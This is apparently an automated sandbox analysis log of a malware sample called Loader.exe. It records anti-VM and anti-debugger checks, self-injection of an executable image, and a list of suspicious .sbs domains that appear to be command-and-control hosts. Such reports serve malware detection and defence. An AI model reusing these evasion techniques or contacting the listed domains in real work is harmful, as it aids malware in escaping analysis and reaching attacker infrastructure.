    Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: Loader.exeStatic PE information: real checksum: 0x8f2e3 should be: 0x9c6d3
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00192198 push eax; ret 0_2_001922BF
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00196D75 push ecx; ret 0_2_00196D88
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0020718D push esp; ret 0_2_0020718E
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00192198 push eax; ret 2_2_001922BF
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00196D75 push ecx; ret 2_2_00196D88
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00449C8D push esp; ret 3_2_00449C8E
    Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\Loader.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_3-19242
    Source: C:\Users\user\Desktop\Loader.exeAPI coverage: 4.0 %
    Source: C:\Users\user\Desktop\Loader.exe TID: 612Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001A9DAA FindFirstFileExW,0_2_001A9DAA
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001A9DAA FindFirstFileExW,2_2_001A9DAA
    Source: Amcache.hve.6.drBinary or memory string: VMware
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
    Source: Loader.exe, 00000003.00000002.2304373806.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2304373806.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.drBinary or memory string: vmci.sys
    Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.drBinary or memory string: VMware20,1
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\Loader.exeAPI call chain: ExitProcess graph end nodegraph_3-19243
    Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00443090 LdrInitializeThunk,3_2_00443090
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019D1AF
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00192198 mov edi, dword ptr fs:[00000030h]0_2_00192198
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001AA937 mov eax, dword ptr fs:[00000030h]0_2_001AA937
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001A0D89 mov ecx, dword ptr fs:[00000030h]0_2_001A0D89
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001AA937 mov eax, dword ptr fs:[00000030h]2_2_001AA937
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00192198 mov edi, dword ptr fs:[00000030h]2_2_00192198
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001A0D89 mov ecx, dword ptr fs:[00000030h]2_2_001A0D89
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001ACF36 GetProcessHeap,0_2_001ACF36
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0019D1AF
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_001971E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_001971E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00197508 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00197508
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00197695 SetUnhandledExceptionFilter,0_2_00197695
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_0019D1AF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0019D1AF
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_001971E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_001971E0
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00197508 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00197508
    Source: C:\Users\user\Desktop\Loader.exeCode function: 2_2_00197695 SetUnhandledExceptionFilter,2_2_00197695

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Users\user\Desktop\Loader.exeMemory written: C:\Users\user\Desktop\Loader.exe base: 400000 value starts with: 4D5AJump to behavior
    Source: Loader.exeString found in binary or memory: drawwyobstacw.sbs
    Source: Loader.exeString found in binary or memory: condifendteu.sbs
    Source: Loader.exeString found in binary or memory: ehticsprocw.sbs
    Source: Loader.exeString found in binary or memory: vennurviot.sbs
    Source: Loader.exeString found in binary or memory: resinedyw.sbs
    Source: Loader.exeString found in binary or memory: enlargkiw.sbs
    Source: Loader.exeString found in binary or memory: allocatinow.sbs
    Source: Loader.exeString found in binary or memory: mathcucom.sbs
    Source: Loader.exeString found in binary or memory: widdensmoywi.sbs
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_001AC370
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_001AC612
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_001AC65D
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_001AC6F8
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_001AC783
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_001AC9D6
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001ACAFF
